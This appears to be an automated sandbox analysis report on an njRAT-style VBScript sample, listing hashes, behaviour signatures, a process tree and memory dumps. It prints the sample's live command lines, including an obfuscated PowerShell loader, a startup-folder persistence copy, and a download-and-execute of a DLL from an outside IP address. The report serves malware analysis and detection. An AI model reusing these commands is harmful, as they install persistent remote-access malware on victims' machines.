Analysis
- max time kernel: 118s
- max time network: 122s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 26-01-2022 08:53

Static task: static1
Behavioral task: behavioral1
- Sample: NJRATCASA22.vbs
- Resource: win7-en-20211208
General
- Target: NJRATCASA22.vbs
- Size: 330KB
- MD5: 8a4f7794001fbe25ab1820e9a66db1da
- SHA1: fd1e5582b21480d6d19b247fe71f96d500314038
- SHA256: 6cbb94dab89d523749b578de2590ad064049c0574476f553df9ffcf9d13ddf51
- SHA512: dd5305d5613314d78972169320971021e9d98af6c7cc5b2cb494996fe275cea87ad9aa9cd4f0109b482e6bb45b88f1fedf557c82925c68b152c7da110a292751
Malware Config
Extracted:
- http://192.99.190.34/dll/1.txt
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow  pid   process
    4     1056  powershell.exe
- Drops startup file (2 IoCs)
  Processes:
    description                   ioc                                                                                     process
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs  powershell.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs  powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
    pid   process
    1464  powershell.exe
    588   powershell.exe
    1056  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1464  powershell.exe
    Token: SeDebugPrivilege  588   powershell.exe
    Token: SeDebugPrivilege  1056  powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes:
    description                       pid   process         target process
    PID 792 wrote to memory of 1500   792   WScript.exe     cmd.exe
    PID 792 wrote to memory of 1500   792   WScript.exe     cmd.exe
    PID 792 wrote to memory of 1500   792   WScript.exe     cmd.exe
    PID 1500 wrote to memory of 320   1500  cmd.exe         PING.EXE
    PID 1500 wrote to memory of 320   1500  cmd.exe         PING.EXE
    PID 1500 wrote to memory of 320   1500  cmd.exe         PING.EXE
    PID 1500 wrote to memory of 1464  1500  cmd.exe         powershell.exe
    PID 1500 wrote to memory of 1464  1500  cmd.exe         powershell.exe
    PID 1500 wrote to memory of 1464  1500  cmd.exe         powershell.exe
    PID 792 wrote to memory of 588    792   WScript.exe     powershell.exe
    PID 792 wrote to memory of 588    792   WScript.exe     powershell.exe
    PID 792 wrote to memory of 588    792   WScript.exe     powershell.exe
    PID 588 wrote to memory of 1056   588   powershell.exe  powershell.exe
    PID 588 wrote to memory of 1056   588   powershell.exe  powershell.exe
    PID 588 wrote to memory of 1056   588   powershell.exe  powershell.exe
Processes
- C:\Windows\System32\WScript.exe  (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe  (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE  (depth 3)
      Command line: ping 127.0.0.1 -n 10
      - Runs ping.exe
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      Command line: powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DE⁂OQ⁂y⁂C4⁂OQ⁂5⁂C4⁂MQ⁂5⁂D⁂⁂Lg⁂z⁂DQ⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂LgB0⁂Hg⁂d⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂EM⁂b⁂Bh⁂HM⁂cwBM⁂Gk⁂YgBy⁂GE⁂cgB5⁂DM⁂LgBD⁂Gw⁂YQBz⁂HM⁂MQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂TwBI⁂Ho⁂Uw⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂EE⁂UwBB⁂EM⁂M⁂⁂y⁂CU⁂V⁂BB⁂FI⁂SgBO⁂D⁂⁂Mg⁂l⁂DQ⁂Ng⁂w⁂DI⁂JQBl⁂HM⁂YQBi⁂C8⁂VwBF⁂E4⁂YQBz⁂GE⁂QwBj⁂HQ⁂YQBy⁂Eo⁂Tg⁂v⁂Gc⁂cgBv⁂C4⁂NQB1⁂GU⁂LgBh⁂HM⁂cwBh⁂GM⁂d⁂Bh⁂HI⁂agBu⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://192.99.190.34/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('OHzS').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: b6ecc4bda7a591cd3aee439b56c01304
  SHA1: fcc98c94aada74e6d199fb16ec258edf7a70737d
  SHA256: 48fd458780744446e033b792086341450adbc36312dbf6da4ac28d7b4ae94ecc
  SHA512: e8017731ae49d9e4090c8a1ac264255f9997052ff46b6387536cbe5827d1e07a5c38c3ac83fc1c4b84e248791b28f53c8fc8606978759a08e7c13ecab7c8079d
- memory/588-63-0x00000000027B0000-0x00000000027B2000-memory.dmp (Filesize 8KB)
- memory/588-70-0x00000000027BB000-0x00000000027DA000-memory.dmp (Filesize 124KB)
- memory/588-66-0x000000001B730000-0x000000001BA2F000-memory.dmp (Filesize 3.0MB)
- memory/588-62-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp (Filesize 11.4MB)
- memory/588-64-0x00000000027B2000-0x00000000027B4000-memory.dmp (Filesize 8KB)
- memory/588-65-0x00000000027B4000-0x00000000027B7000-memory.dmp (Filesize 12KB)
- memory/792-54-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp (Filesize 8KB)
- memory/1056-69-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp (Filesize 11.4MB)
- memory/1056-71-0x0000000002720000-0x0000000002722000-memory.dmp (Filesize 8KB)
- memory/1056-72-0x0000000002722000-0x0000000002724000-memory.dmp (Filesize 8KB)
- memory/1056-73-0x0000000002724000-0x0000000002727000-memory.dmp (Filesize 12KB)
- memory/1056-74-0x000000000272B000-0x000000000274A000-memory.dmp (Filesize 124KB)
- memory/1464-56-0x000007FEF3820000-0x000007FEF437D000-memory.dmp (Filesize 11.4MB)
- memory/1464-59-0x0000000002440000-0x00000000024C0000-memory.dmp (Filesize 512KB)
- memory/1464-58-0x0000000002440000-0x00000000024C0000-memory.dmp (Filesize 512KB)
- memory/1464-57-0x0000000002440000-0x00000000024C0000-memory.dmp (Filesize 512KB)